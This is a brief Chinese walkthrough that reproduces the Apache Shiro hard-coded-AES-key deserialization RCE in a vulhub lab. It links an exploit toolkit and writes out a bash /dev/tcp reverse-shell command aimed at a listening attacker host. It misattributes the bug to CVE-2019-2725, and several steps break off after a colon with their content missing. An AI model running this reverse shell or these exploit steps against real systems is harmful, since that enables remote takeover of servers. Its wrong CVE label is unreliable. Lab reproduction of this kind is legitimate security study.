漏洞简述
- Apache shiro默认使用了
CookieRememberMeManager
,其处理cookie的流程是:
-
然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
-
漏洞编号:CVE-2019-2725
-
影响版本:1.2.4及以前版本
-
测试环境:Linux || vulhub || Apache Shiro
复现开始
-
工具获取:
https://github.com/zhzyker/exphub
-
首先,启动Apache Shiro服务:
利用该漏洞进行反弹shell
1、在攻击机(VPS)上侦听6666端口:
2、在另外一台攻击机上利用工具发起攻击:
- 指定目标主机操作系统,输入反弹指令
bash -i >&/dev/tcp/192.168.83.134/6666 0>&1
。此时回显Command Send Seccess
。
- shell已经反弹到攻击机(VPS)上了